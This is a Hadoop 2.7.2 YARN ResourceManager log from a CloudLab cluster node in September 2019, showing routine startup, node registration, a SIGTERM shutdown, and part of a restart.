2019-09-23 14:47:13,275 INFO org.apache.hadoop.yarn.server.resourcemanager.ResourceManager: STARTUP_MSG: 
/************************************************************
STARTUP_MSG: Starting ResourceManager
STARTUP_MSG:   host = ctl.hwcluster.ams560-sbu-pg0.utah.cloudlab.us/128.110.153.96
STARTUP_MSG:   args = []
STARTUP_MSG:   version = 2.7.2
STARTUP_MSG:   build = https://git-wip-us.apache.org/repos/asf/hadoop.git -r b165c4fe8a74265c792ce23f546c64604acf0e41; compiled by 'jenkins' on 2016-01-26T00:08Z
STARTUP_MSG:   java = 1.8.0_222
************************************************************/
2019-09-23 14:47:13,285 INFO org.apache.hadoop.yarn.server.resourcemanager.ResourceManager: registered UNIX signal handlers for [TERM, HUP, INT]
2019-09-23 14:47:13,621 INFO org.apache.hadoop.conf.Configuration: found resource core-site.xml at file:/users/F19_TIP/hadoop/etc/hadoop/core-site.xml
2019-09-23 14:47:13,719 INFO org.apache.hadoop.security.Groups: clearing userToGroupsMap cache
2019-09-23 14:47:13,803 INFO org.apache.hadoop.conf.Configuration: found resource yarn-site.xml at file:/users/F19_TIP/hadoop/etc/hadoop/yarn-site.xml
2019-09-23 14:47:13,973 INFO org.apache.hadoop.yarn.event.AsyncDispatcher: Registering class org.apache.hadoop.yarn.server.resourcemanager.RMFatalEventType for class org.apache.hadoop.yarn.server.resourcemanager.ResourceManager$RMFatalEventDispatcher
2019-09-23 14:47:14,050 INFO org.apache.hadoop.yarn.server.resourcemanager.security.NMTokenSecretManagerInRM: NMTokenKeyRollingInterval: 86400000ms and NMTokenKeyActivationDelay: 900000ms
2019-09-23 14:47:14,054 INFO org.apache.hadoop.yarn.server.resourcemanager.security.RMContainerTokenSecretManager: ContainerTokenKeyRollingInterval: 86400000ms and ContainerTokenKeyActivationDelay: 900000ms
2019-09-23 14:47:14,059 INFO org.apache.hadoop.yarn.server.resourcemanager.security.AMRMTokenSecretManager: AMRMTokenKeyRollingInterval: 86400000ms and AMRMTokenKeyActivationDelay: 900000 ms
2019-09-23 14:47:14,096 INFO org.apache.hadoop.yarn.event.AsyncDispatcher: Registering class org.apache.hadoop.yarn.server.resourcemanager.recovery.RMStateStoreEventType for class org.apache.hadoop.yarn.server.resourcemanager.recovery.RMStateStore$ForwardingEventHandler
2019-09-23 14:47:14,098 INFO org.apache.hadoop.yarn.event.AsyncDispatcher: Registering class org.apache.hadoop.yarn.server.resourcemanager.NodesListManagerEventType for class org.apache.hadoop.yarn.server.resourcemanager.NodesListManager
2019-09-23 14:47:14,098 INFO org.apache.hadoop.yarn.server.resourcemanager.ResourceManager: Using Scheduler: org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FairScheduler
2019-09-23 14:47:14,136 INFO org.apache.hadoop.yarn.event.AsyncDispatcher: Registering class org.apache.hadoop.yarn.server.resourcemanager.scheduler.event.SchedulerEventType for class org.apache.hadoop.yarn.server.resourcemanager.ResourceManager$SchedulerEventDispatcher
2019-09-23 14:47:14,137 INFO org.apache.hadoop.yarn.event.AsyncDispatcher: Registering class org.apache.hadoop.yarn.server.resourcemanager.rmapp.RMAppEventType for class org.apache.hadoop.yarn.server.resourcemanager.ResourceManager$ApplicationEventDispatcher
2019-09-23 14:47:14,138 INFO org.apache.hadoop.yarn.event.AsyncDispatcher: Registering class org.apache.hadoop.yarn.server.resourcemanager.rmapp.attempt.RMAppAttemptEventType for class org.apache.hadoop.yarn.server.resourcemanager.ResourceManager$ApplicationAttemptEventDispatcher
2019-09-23 14:47:14,139 INFO org.apache.hadoop.yarn.event.AsyncDispatcher: Registering class org.apache.hadoop.yarn.server.resourcemanager.rmnode.RMNodeEventType for class org.apache.hadoop.yarn.server.resourcemanager.ResourceManager$NodeEventDispatcher
2019-09-23 14:47:14,222 INFO org.apache.hadoop.metrics2.impl.MetricsConfig: loaded properties from hadoop-metrics2.properties
2019-09-23 14:47:14,290 INFO org.apache.hadoop.metrics2.impl.MetricsSystemImpl: Scheduled snapshot period at 10 second(s).
2019-09-23 14:47:14,290 INFO org.apache.hadoop.metrics2.impl.MetricsSystemImpl: ResourceManager metrics system started
2019-09-23 14:47:14,305 INFO org.apache.hadoop.yarn.event.AsyncDispatcher: Registering class org.apache.hadoop.yarn.server.resourcemanager.RMAppManagerEventType for class org.apache.hadoop.yarn.server.resourcemanager.RMAppManager
2019-09-23 14:47:14,312 INFO org.apache.hadoop.yarn.event.AsyncDispatcher: Registering class org.apache.hadoop.yarn.server.resourcemanager.amlauncher.AMLauncherEventType for class org.apache.hadoop.yarn.server.resourcemanager.amlauncher.ApplicationMasterLauncher
2019-09-23 14:47:14,314 INFO org.apache.hadoop.yarn.server.resourcemanager.RMNMInfo: Registered RMNMInfo MBean
2019-09-23 14:47:14,317 INFO org.apache.hadoop.yarn.security.YarnAuthorizationProvider: org.apache.hadoop.yarn.security.ConfiguredYarnAuthorizer is instiantiated.
2019-09-23 14:47:14,317 INFO org.apache.hadoop.util.HostsFileReader: Refreshing hosts (include/exclude) list
2019-09-23 14:47:14,353 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.AllocationFileLoaderService: Loading allocation file /users/F19_TIP/hadoop/etc/hadoop/fair-scheduler.xml
2019-09-23 14:47:14,379 INFO org.apache.hadoop.yarn.server.resourcemanager.metrics.SystemMetricsPublisher: YARN system metrics publishing service is not enabled
2019-09-23 14:47:14,379 INFO org.apache.hadoop.yarn.server.resourcemanager.ResourceManager: Transitioning to active state
2019-09-23 14:47:14,391 INFO org.apache.hadoop.yarn.server.resourcemanager.recovery.RMStateStore: Updating AMRMToken
2019-09-23 14:47:14,392 INFO org.apache.hadoop.yarn.server.resourcemanager.security.RMContainerTokenSecretManager: Rolling master-key for container-tokens
2019-09-23 14:47:14,392 INFO org.apache.hadoop.yarn.server.resourcemanager.security.NMTokenSecretManagerInRM: Rolling master-key for nm-tokens
2019-09-23 14:47:14,392 INFO org.apache.hadoop.security.token.delegation.AbstractDelegationTokenSecretManager: Updating the current master key for generating delegation tokens
2019-09-23 14:47:14,393 INFO org.apache.hadoop.yarn.server.resourcemanager.security.RMDelegationTokenSecretManager: storing master key with keyID 1
2019-09-23 14:47:14,393 INFO org.apache.hadoop.yarn.server.resourcemanager.recovery.RMStateStore: Storing RMDTMasterKey.
2019-09-23 14:47:14,394 INFO org.apache.hadoop.security.token.delegation.AbstractDelegationTokenSecretManager: Starting expired delegation token remover thread, tokenRemoverScanInterval=60 min(s)
2019-09-23 14:47:14,394 INFO org.apache.hadoop.security.token.delegation.AbstractDelegationTokenSecretManager: Updating the current master key for generating delegation tokens
2019-09-23 14:47:14,394 INFO org.apache.hadoop.yarn.server.resourcemanager.security.RMDelegationTokenSecretManager: storing master key with keyID 2
2019-09-23 14:47:14,394 INFO org.apache.hadoop.yarn.server.resourcemanager.recovery.RMStateStore: Storing RMDTMasterKey.
2019-09-23 14:47:14,396 INFO org.apache.hadoop.yarn.event.AsyncDispatcher: Registering class org.apache.hadoop.yarn.nodelabels.event.NodeLabelsStoreEventType for class org.apache.hadoop.yarn.nodelabels.CommonNodeLabelsManager$ForwardingEventHandler
2019-09-23 14:47:14,425 INFO org.apache.hadoop.ipc.CallQueueManager: Using callQueue class java.util.concurrent.LinkedBlockingQueue
2019-09-23 14:47:14,439 INFO org.apache.hadoop.ipc.Server: Starting Socket Reader #1 for port 8031
2019-09-23 14:47:14,455 INFO org.apache.hadoop.yarn.factories.impl.pb.RpcServerFactoryPBImpl: Adding protocol org.apache.hadoop.yarn.server.api.ResourceTrackerPB to the server
2019-09-23 14:47:14,455 INFO org.apache.hadoop.ipc.Server: IPC Server Responder: starting
2019-09-23 14:47:14,455 INFO org.apache.hadoop.ipc.Server: IPC Server listener on 8031: starting
2019-09-23 14:47:14,496 INFO org.apache.hadoop.ipc.CallQueueManager: Using callQueue class java.util.concurrent.LinkedBlockingQueue
2019-09-23 14:47:14,502 INFO org.apache.hadoop.ipc.Server: Starting Socket Reader #1 for port 8030
2019-09-23 14:47:14,512 INFO org.apache.hadoop.yarn.factories.impl.pb.RpcServerFactoryPBImpl: Adding protocol org.apache.hadoop.yarn.api.ApplicationMasterProtocolPB to the server
2019-09-23 14:47:14,513 INFO org.apache.hadoop.ipc.Server: IPC Server Responder: starting
2019-09-23 14:47:14,513 INFO org.apache.hadoop.ipc.Server: IPC Server listener on 8030: starting
2019-09-23 14:47:14,565 INFO org.apache.hadoop.ipc.CallQueueManager: Using callQueue class java.util.concurrent.LinkedBlockingQueue
2019-09-23 14:47:14,566 INFO org.apache.hadoop.ipc.Server: Starting Socket Reader #1 for port 8032
2019-09-23 14:47:14,571 INFO org.apache.hadoop.yarn.factories.impl.pb.RpcServerFactoryPBImpl: Adding protocol org.apache.hadoop.yarn.api.ApplicationClientProtocolPB to the server
2019-09-23 14:47:14,571 INFO org.apache.hadoop.ipc.Server: IPC Server Responder: starting
2019-09-23 14:47:14,571 INFO org.apache.hadoop.ipc.Server: IPC Server listener on 8032: starting
2019-09-23 14:47:14,581 INFO org.apache.hadoop.yarn.server.resourcemanager.ResourceManager: Transitioned to active state
2019-09-23 14:47:14,663 INFO org.mortbay.log: Logging to org.slf4j.impl.Log4jLoggerAdapter(org.mortbay.log) via org.mortbay.log.Slf4jLog
2019-09-23 14:47:14,669 INFO org.apache.hadoop.security.authentication.server.AuthenticationFilter: Unable to initialize FileSignerSecretProvider, falling back to use random secrets.
2019-09-23 14:47:14,675 INFO org.apache.hadoop.http.HttpRequestLog: Http request log for http.requests.resourcemanager is not defined
2019-09-23 14:47:14,682 INFO org.apache.hadoop.http.HttpServer2: Added global filter 'safety' (class=org.apache.hadoop.http.HttpServer2$QuotingInputFilter)
2019-09-23 14:47:14,685 INFO org.apache.hadoop.http.HttpServer2: Added filter RMAuthenticationFilter (class=org.apache.hadoop.yarn.server.security.http.RMAuthenticationFilter) to context cluster
2019-09-23 14:47:14,685 INFO org.apache.hadoop.http.HttpServer2: Added filter RMAuthenticationFilter (class=org.apache.hadoop.yarn.server.security.http.RMAuthenticationFilter) to context static
2019-09-23 14:47:14,685 INFO org.apache.hadoop.http.HttpServer2: Added filter RMAuthenticationFilter (class=org.apache.hadoop.yarn.server.security.http.RMAuthenticationFilter) to context logs
2019-09-23 14:47:14,686 INFO org.apache.hadoop.http.HttpServer2: Added filter static_user_filter (class=org.apache.hadoop.http.lib.StaticUserWebFilter$StaticUserFilter) to context cluster
2019-09-23 14:47:14,686 INFO org.apache.hadoop.http.HttpServer2: Added filter static_user_filter (class=org.apache.hadoop.http.lib.StaticUserWebFilter$StaticUserFilter) to context static
2019-09-23 14:47:14,686 INFO org.apache.hadoop.http.HttpServer2: Added filter static_user_filter (class=org.apache.hadoop.http.lib.StaticUserWebFilter$StaticUserFilter) to context logs
2019-09-23 14:47:14,689 INFO org.apache.hadoop.http.HttpServer2: adding path spec: /cluster/*
2019-09-23 14:47:14,690 INFO org.apache.hadoop.http.HttpServer2: adding path spec: /ws/*
2019-09-23 14:47:15,048 INFO org.apache.hadoop.yarn.webapp.WebApps: Registered webapp guice modules
2019-09-23 14:47:15,050 INFO org.apache.hadoop.http.HttpServer2: Jetty bound to port 8088
2019-09-23 14:47:15,050 INFO org.mortbay.log: jetty-6.1.26
2019-09-23 14:47:15,125 INFO org.mortbay.log: Extract jar:file:/users/F19_TIP/hadoop/share/hadoop/yarn/hadoop-yarn-common-2.7.2.jar!/webapps/cluster to /tmp/Jetty_ms0833_utah_cloudlab_us_8088_cluster____u3cdjd/webapp
2019-09-23 14:47:15,287 INFO org.apache.hadoop.security.token.delegation.AbstractDelegationTokenSecretManager: Updating the current master key for generating delegation tokens
2019-09-23 14:47:15,287 INFO org.apache.hadoop.security.token.delegation.AbstractDelegationTokenSecretManager: Starting expired delegation token remover thread, tokenRemoverScanInterval=60 min(s)
2019-09-23 14:47:15,288 INFO org.apache.hadoop.security.token.delegation.AbstractDelegationTokenSecretManager: Updating the current master key for generating delegation tokens
2019-09-23 14:47:16,240 INFO org.mortbay.log: Started HttpServer2$SelectChannelConnectorWithSafeStartup@master_hostname:8088
2019-09-23 14:47:16,240 INFO org.apache.hadoop.yarn.webapp.WebApps: Web app cluster started at 8088
2019-09-23 14:47:16,267 INFO org.apache.hadoop.ipc.CallQueueManager: Using callQueue class java.util.concurrent.LinkedBlockingQueue
2019-09-23 14:47:16,268 INFO org.apache.hadoop.ipc.Server: Starting Socket Reader #1 for port 8033
2019-09-23 14:47:16,270 INFO org.apache.hadoop.yarn.factories.impl.pb.RpcServerFactoryPBImpl: Adding protocol org.apache.hadoop.yarn.server.api.ResourceManagerAdministrationProtocolPB to the server
2019-09-23 14:47:16,270 INFO org.apache.hadoop.ipc.Server: IPC Server Responder: starting
2019-09-23 14:47:16,270 INFO org.apache.hadoop.ipc.Server: IPC Server listener on 8033: starting
2019-09-23 14:47:17,181 INFO org.apache.hadoop.yarn.util.RackResolver: Resolved cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us to /default-rack
2019-09-23 14:47:17,184 INFO org.apache.hadoop.yarn.server.resourcemanager.ResourceTrackerService: NodeManager from node cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us(cmPort: 44527 httpPort: 8042) registered with capability: <memory:65536, vCores:32>, assigned nodeId cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:44527
2019-09-23 14:47:17,186 INFO org.apache.hadoop.yarn.server.resourcemanager.rmnode.RMNodeImpl: cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:44527 Node Transitioned from NEW to RUNNING
2019-09-23 14:47:17,190 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FairScheduler: Added node cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:44527 cluster capacity: <memory:65536, vCores:32>
2019-09-23 14:57:14,368 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.AbstractYarnScheduler: Release request cache is cleaned up
2019-09-23 15:17:33,797 ERROR org.apache.hadoop.yarn.server.resourcemanager.ResourceManager: RECEIVED SIGNAL 15: SIGTERM
2019-09-23 15:17:33,802 ERROR org.apache.hadoop.security.token.delegation.AbstractDelegationTokenSecretManager: ExpiredTokenRemover received java.lang.InterruptedException: sleep interrupted
2019-09-23 15:17:33,803 INFO org.mortbay.log: Stopped HttpServer2$SelectChannelConnectorWithSafeStartup@master_hostname:8088
2019-09-23 15:17:33,907 INFO org.apache.hadoop.ipc.Server: Stopping server on 8032
2019-09-23 15:17:33,909 INFO org.apache.hadoop.ipc.Server: Stopping IPC Server listener on 8032
2019-09-23 15:17:33,909 INFO org.apache.hadoop.ipc.Server: Stopping server on 8033
2019-09-23 15:17:33,910 INFO org.apache.hadoop.ipc.Server: Stopping IPC Server listener on 8033
2019-09-23 15:17:33,910 INFO org.apache.hadoop.ipc.Server: Stopping IPC Server Responder
2019-09-23 15:17:33,910 INFO org.apache.hadoop.ipc.Server: Stopping IPC Server Responder
2019-09-23 15:17:33,910 INFO org.apache.hadoop.yarn.server.resourcemanager.ResourceManager: Transitioning to standby state
2019-09-23 15:17:33,911 WARN org.apache.hadoop.yarn.server.resourcemanager.amlauncher.ApplicationMasterLauncher: org.apache.hadoop.yarn.server.resourcemanager.amlauncher.ApplicationMasterLauncher$LauncherThread interrupted. Returning.
2019-09-23 15:17:33,911 INFO org.apache.hadoop.ipc.Server: Stopping server on 8030
2019-09-23 15:17:33,914 INFO org.apache.hadoop.ipc.Server: Stopping IPC Server listener on 8030
2019-09-23 15:17:33,914 INFO org.apache.hadoop.ipc.Server: Stopping server on 8031
2019-09-23 15:17:33,915 INFO org.apache.hadoop.ipc.Server: Stopping IPC Server listener on 8031
2019-09-23 15:17:33,915 INFO org.apache.hadoop.ipc.Server: Stopping IPC Server Responder
2019-09-23 15:17:33,916 ERROR org.apache.hadoop.yarn.server.resourcemanager.ResourceManager: Returning, interrupted : java.lang.InterruptedException
2019-09-23 15:17:33,917 INFO org.apache.hadoop.yarn.util.AbstractLivelinessMonitor: NMLivelinessMonitor thread interrupted
2019-09-23 15:17:33,918 INFO org.apache.hadoop.ipc.Server: Stopping IPC Server Responder
2019-09-23 15:17:33,917 WARN org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FairScheduler: Update thread interrupted. Exiting.
2019-09-23 15:17:33,919 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.AllocationFileLoaderService: Interrupted while waiting to reload alloc configuration
2019-09-23 15:17:33,919 INFO org.apache.hadoop.yarn.event.AsyncDispatcher: AsyncDispatcher is draining to stop, igonring any new events.
2019-09-23 15:17:33,919 INFO org.apache.hadoop.yarn.util.AbstractLivelinessMonitor: AMLivelinessMonitor thread interrupted
2019-09-23 15:17:33,919 INFO org.apache.hadoop.yarn.util.AbstractLivelinessMonitor: AMLivelinessMonitor thread interrupted
2019-09-23 15:17:33,919 INFO org.apache.hadoop.yarn.util.AbstractLivelinessMonitor: org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.ContainerAllocationExpirer thread interrupted
2019-09-23 15:17:33,919 ERROR org.apache.hadoop.security.token.delegation.AbstractDelegationTokenSecretManager: ExpiredTokenRemover received java.lang.InterruptedException: sleep interrupted
2019-09-23 15:17:33,920 INFO org.apache.hadoop.metrics2.impl.MetricsSystemImpl: Stopping ResourceManager metrics system...
2019-09-23 15:17:33,922 INFO org.apache.hadoop.metrics2.impl.MetricsSystemImpl: ResourceManager metrics system stopped.
2019-09-23 15:17:33,922 INFO org.apache.hadoop.metrics2.impl.MetricsSystemImpl: ResourceManager metrics system shutdown complete.
2019-09-23 15:17:33,922 INFO org.apache.hadoop.yarn.event.AsyncDispatcher: AsyncDispatcher is draining to stop, igonring any new events.
2019-09-23 15:17:33,922 INFO org.apache.hadoop.yarn.server.resourcemanager.ResourceManager: Transitioned to standby state
2019-09-23 15:17:33,923 INFO org.apache.hadoop.yarn.server.resourcemanager.ResourceManager: SHUTDOWN_MSG: 
/************************************************************
SHUTDOWN_MSG: Shutting down ResourceManager at ctl.hwcluster.ams560-sbu-pg0.utah.cloudlab.us/128.110.153.96
************************************************************/
2019-09-23 15:17:57,752 INFO org.apache.hadoop.yarn.server.resourcemanager.ResourceManager: STARTUP_MSG: 
/************************************************************
STARTUP_MSG: Starting ResourceManager
STARTUP_MSG:   host = ctl.hwcluster.ams560-sbu-pg0.utah.cloudlab.us/128.110.153.96
STARTUP_MSG:   args = []
STARTUP_MSG:   version = 2.7.2
STARTUP_MSG:   build = https://git-wip-us.apache.org/repos/asf/hadoop.git -r b165c4fe8a74265c792ce23f546c64604acf0e41; compiled by 'jenkins' on 2016-01-26T00:08Z
STARTUP_MSG:   java = 1.8.0_222
************************************************************/
2019-09-23 15:17:57,762 INFO org.apache.hadoop.yarn.server.resourcemanager.ResourceManager: registered UNIX signal handlers for [TERM, HUP, INT]
2019-09-23 15:17:58,117 INFO org.apache.hadoop.conf.Configuration: found resource core-site.xml at file:/users/F19_TIP/hadoop/etc/hadoop/core-site.xml
2019-09-23 15:17:58,199 INFO org.apache.hadoop.security.Groups: clearing userToGroupsMap cache
2019-09-23 15:17:58,285 INFO org.apache.hadoop.conf.Configuration: found resource yarn-site.xml at file:/users/F19_TIP/hadoop/etc/hadoop/yarn-site.xml
2019-09-23 15:17:58,436 INFO org.apache.hadoop.yarn.event.AsyncDispatcher: Registering class org.apache.hadoop.yarn.server.resourcemanager.RMFatalEventType for class org.apache.hadoop.yarn.server.resourcemanager.ResourceManager$RMFatalEventDispatcher
2019-09-23 15:17:58,497 INFO org.apache.hadoop.yarn.server.resourcemanager.security.NMTokenSecretManagerInRM: NMTokenKeyRollingInterval: 86400000ms and NMTokenKeyActivationDelay: 900000ms
2019-09-23 15:17:58,502 INFO org.apache.hadoop.yarn.server.resourcemanager.security.RMContainerTokenSecretManager: ContainerTokenKeyRollingInterval: 86400000ms and ContainerTokenKeyActivationDelay: 900000ms
2019-09-23 15:17:58,508 INFO org.apache.hadoop.yarn.server.resourcemanager.security.AMRMTokenSecretManager: AMRMTokenKeyRollingInterval: 86400000ms and AMRMTokenKeyActivationDelay: 900000 ms
2019-09-23 15:17:58,549 INFO org.apache.hadoop.yarn.event.AsyncDispatcher: Registering class org.apache.hadoop.yarn.server.resourcemanager.recovery.RMStateStoreEventType for class org.apache.hadoop.yarn.server.resourcemanager.recovery.RMStateStore$ForwardingEventHandler
2019-09-23 15:17:58,552 INFO org.apache.hadoop.yarn.event.AsyncDispatcher: Registering class org.apache.hadoop.yarn.server.resourcemanager.NodesListManagerEventType for class org.apache.hadoop.yarn.server.resourcemanager.NodesListManager
2019-09-23 15:17:58,552 INFO org.apache.hadoop.yarn.server.resourcemanager.ResourceManager: Using Scheduler: org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FairScheduler
2019-09-23 15:17:58,616 INFO org.apache.hadoop.yarn.event.AsyncDispatcher: Registering class org.apache.hadoop.yarn.server.resourcemanager.scheduler.event.SchedulerEventType for class org.apache.hadoop.yarn.server.resourcemanager.ResourceManager$SchedulerEventDispatcher
2019-09-23 15:17:58,618 INFO org.apache.hadoop.yarn.event.AsyncDispatcher: Registering class org.apache.hadoop.yarn.server.resourcemanager.rmapp.RMAppEventType for class org.apache.hadoop.yarn.server.resourcemanager.ResourceManager$ApplicationEventDispatcher
2019-09-23 15:17:58,620 INFO org.apache.hadoop.yarn.event.AsyncDispatcher: Registering class org.apache.hadoop.yarn.server.resourcemanager.rmapp.attempt.RMAppAttemptEventType for class org.apache.hadoop.yarn.server.resourcemanager.ResourceManager$ApplicationAttemptEventDispatcher
2019-09-23 15:17:58,621 INFO org.apache.hadoop.yarn.event.AsyncDispatcher: Registering class org.apache.hadoop.yarn.server.resourcemanager.rmnode.RMNodeEventType for class org.apache.hadoop.yarn.server.resourcemanager.ResourceManager$NodeEventDispatcher
2019-09-23 15:17:58,708 INFO org.apache.hadoop.metrics2.impl.MetricsConfig: loaded properties from hadoop-metrics2.properties
2019-09-23 15:17:58,786 INFO org.apache.hadoop.metrics2.impl.MetricsSystemImpl: Scheduled snapshot period at 10 second(s).
2019-09-23 15:17:58,786 INFO org.apache.hadoop.metrics2.impl.MetricsSystemImpl: ResourceManager metrics system started
2019-09-23 15:17:58,808 INFO org.apache.hadoop.yarn.event.AsyncDispatcher: Registering class org.apache.hadoop.yarn.server.resourcemanager.RMAppManagerEventType for class org.apache.hadoop.yarn.server.resourcemanager.RMAppManager
2019-09-23 15:17:58,821 INFO org.apache.hadoop.yarn.event.AsyncDispatcher: Registering class org.apache.hadoop.yarn.server.resourcemanager.amlauncher.AMLauncherEventType for class org.apache.hadoop.yarn.server.resourcemanager.amlauncher.ApplicationMasterLauncher
2019-09-23 15:17:58,825 INFO org.apache.hadoop.yarn.server.resourcemanager.RMNMInfo: Registered RMNMInfo MBean
2019-09-23 15:17:58,829 INFO org.apache.hadoop.yarn.security.YarnAuthorizationProvider: org.apache.hadoop.yarn.security.ConfiguredYarnAuthorizer is instiantiated.
2019-09-23 15:17:58,831 INFO org.apache.hadoop.util.HostsFileReader: Refreshing hosts (include/exclude) list
2019-09-23 15:17:58,894 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.AllocationFileLoaderService: Loading allocation file /users/F19_TIP/hadoop/etc/hadoop/fair-scheduler.xml
2019-09-23 15:17:58,926 INFO org.apache.hadoop.yarn.server.resourcemanager.metrics.SystemMetricsPublisher: YARN system metrics publishing service is not enabled
2019-09-23 15:17:58,926 INFO org.apache.hadoop.yarn.server.resourcemanager.ResourceManager: Transitioning to active state
2019-09-23 15:17:58,939 INFO org.apache.hadoop.yarn.server.resourcemanager.recovery.RMStateStore: Updating AMRMToken
2019-09-23 15:17:58,939 INFO org.apache.hadoop.yarn.server.resourcemanager.security.RMContainerTokenSecretManager: Rolling master-key for container-tokens
2019-09-23 15:17:58,939 INFO org.apache.hadoop.yarn.server.resourcemanager.security.NMTokenSecretManagerInRM: Rolling master-key for nm-tokens
2019-09-23 15:17:58,940 INFO org.apache.hadoop.security.token.delegation.AbstractDelegationTokenSecretManager: Updating the current master key for generating delegation tokens
2019-09-23 15:17:58,940 INFO org.apache.hadoop.yarn.server.resourcemanager.security.RMDelegationTokenSecretManager: storing master key with keyID 1
2019-09-23 15:17:58,940 INFO org.apache.hadoop.yarn.server.resourcemanager.recovery.RMStateStore: Storing RMDTMasterKey.
2019-09-23 15:17:58,941 INFO org.apache.hadoop.security.token.delegation.AbstractDelegationTokenSecretManager: Starting expired delegation token remover thread, tokenRemoverScanInterval=60 min(s)
2019-09-23 15:17:58,942 INFO org.apache.hadoop.security.token.delegation.AbstractDelegationTokenSecretManager: Updating the current master key for generating delegation tokens
2019-09-23 15:17:58,942 INFO org.apache.hadoop.yarn.server.resourcemanager.security.RMDelegationTokenSecretManager: storing master key with keyID 2
2019-09-23 15:17:58,942 INFO org.apache.hadoop.yarn.server.resourcemanager.recovery.RMStateStore: Storing RMDTMasterKey.
2019-09-23 15:17:58,943 INFO org.apache.hadoop.yarn.event.AsyncDispatcher: Registering class org.apache.hadoop.yarn.nodelabels.event.NodeLabelsStoreEventType for class org.apache.hadoop.yarn.nodelabels.CommonNodeLabelsManager$ForwardingEventHandler
2019-09-23 15:17:58,971 INFO org.apache.hadoop.ipc.CallQueueManager: Using callQueue class java.util.concurrent.LinkedBlockingQueue
2019-09-23 15:17:58,985 INFO org.apache.hadoop.ipc.Server: Starting Socket Reader #1 for port 8031
2019-09-23 15:17:59,001 INFO org.apache.hadoop.yarn.factories.impl.pb.RpcServerFactoryPBImpl: Adding protocol org.apache.hadoop.yarn.server.api.ResourceTrackerPB to the server
2019-09-23 15:17:59,001 INFO org.apache.hadoop.ipc.Server: IPC Server Responder: starting
2019-09-23 15:17:59,001 INFO org.apache.hadoop.ipc.Server: IPC Server listener on 8031: starting
2019-09-23 15:17:59,043 INFO org.apache.hadoop.ipc.CallQueueManager: Using callQueue class java.util.concurrent.LinkedBlockingQueue
2019-09-23 15:17:59,049 INFO org.apache.hadoop.ipc.Server: Starting Socket Reader #1 for port 8030
2019-09-23 15:17:59,055 INFO org.apache.hadoop.yarn.factories.impl.pb.RpcServerFactoryPBImpl: Adding protocol org.apache.hadoop.yarn.api.ApplicationMasterProtocolPB to the server
2019-09-23 15:17:59,057 INFO org.apache.hadoop.ipc.Server: IPC Server Responder: starting
2019-09-23 15:17:59,057 INFO org.apache.hadoop.ipc.Server: IPC Server listener on 8030: starting
2019-09-23 15:17:59,106 INFO org.apache.hadoop.ipc.CallQueueManager: Using callQueue class java.util.concurrent.LinkedBlockingQueue
2019-09-23 15:17:59,107 INFO org.apache.hadoop.ipc.Server: Starting Socket Reader #1 for port 8032
2019-09-23 15:17:59,110 INFO org.apache.hadoop.yarn.factories.impl.pb.RpcServerFactoryPBImpl: Adding protocol org.apache.hadoop.yarn.api.ApplicationClientProtocolPB to the server
2019-09-23 15:17:59,110 INFO org.apache.hadoop.ipc.Server: IPC Server Responder: starting
2019-09-23 15:17:59,110 INFO org.apache.hadoop.ipc.Server: IPC Server listener on 8032: starting
2019-09-23 15:17:59,120 INFO org.apache.hadoop.yarn.server.resourcemanager.ResourceManager: Transitioned to active state
2019-09-23 15:17:59,242 INFO org.mortbay.log: Logging to org.slf4j.impl.Log4jLoggerAdapter(org.mortbay.log) via org.mortbay.log.Slf4jLog
2019-09-23 15:17:59,258 INFO org.apache.hadoop.security.authentication.server.AuthenticationFilter: Unable to initialize FileSignerSecretProvider, falling back to use random secrets.
2019-09-23 15:17:59,271 INFO org.apache.hadoop.http.HttpRequestLog: Http request log for http.requests.resourcemanager is not defined
2019-09-23 15:17:59,286 INFO org.apache.hadoop.http.HttpServer2: Added global filter 'safety' (class=org.apache.hadoop.http.HttpServer2$QuotingInputFilter)
2019-09-23 15:17:59,289 INFO org.apache.hadoop.http.HttpServer2: Added filter RMAuthenticationFilter (class=org.apache.hadoop.yarn.server.security.http.RMAuthenticationFilter) to context cluster
2019-09-23 15:17:59,289 INFO org.apache.hadoop.http.HttpServer2: Added filter RMAuthenticationFilter (class=org.apache.hadoop.yarn.server.security.http.RMAuthenticationFilter) to context static
2019-09-23 15:17:59,289 INFO org.apache.hadoop.http.HttpServer2: Added filter RMAuthenticationFilter (class=org.apache.hadoop.yarn.server.security.http.RMAuthenticationFilter) to context logs
2019-09-23 15:17:59,290 INFO org.apache.hadoop.http.HttpServer2: Added filter static_user_filter (class=org.apache.hadoop.http.lib.StaticUserWebFilter$StaticUserFilter) to context cluster
2019-09-23 15:17:59,290 INFO org.apache.hadoop.http.HttpServer2: Added filter static_user_filter (class=org.apache.hadoop.http.lib.StaticUserWebFilter$StaticUserFilter) to context static
2019-09-23 15:17:59,290 INFO org.apache.hadoop.http.HttpServer2: Added filter static_user_filter (class=org.apache.hadoop.http.lib.StaticUserWebFilter$StaticUserFilter) to context logs
2019-09-23 15:17:59,295 INFO org.apache.hadoop.http.HttpServer2: adding path spec: /cluster/*
2019-09-23 15:17:59,296 INFO org.apache.hadoop.http.HttpServer2: adding path spec: /ws/*
2019-09-23 15:17:59,668 INFO org.apache.hadoop.yarn.webapp.WebApps: Registered webapp guice modules
2019-09-23 15:17:59,672 INFO org.apache.hadoop.http.HttpServer2: Jetty bound to port 8088
2019-09-23 15:17:59,672 INFO org.mortbay.log: jetty-6.1.26
2019-09-23 15:17:59,752 INFO org.mortbay.log: Extract jar:file:/users/F19_TIP/hadoop/share/hadoop/yarn/hadoop-yarn-common-2.7.2.jar!/webapps/cluster to /tmp/Jetty_ms0833_utah_cloudlab_us_8088_cluster____u3cdjd/webapp
2019-09-23 15:17:59,958 INFO org.apache.hadoop.security.token.delegation.AbstractDelegationTokenSecretManager: Updating the current master key for generating delegation tokens
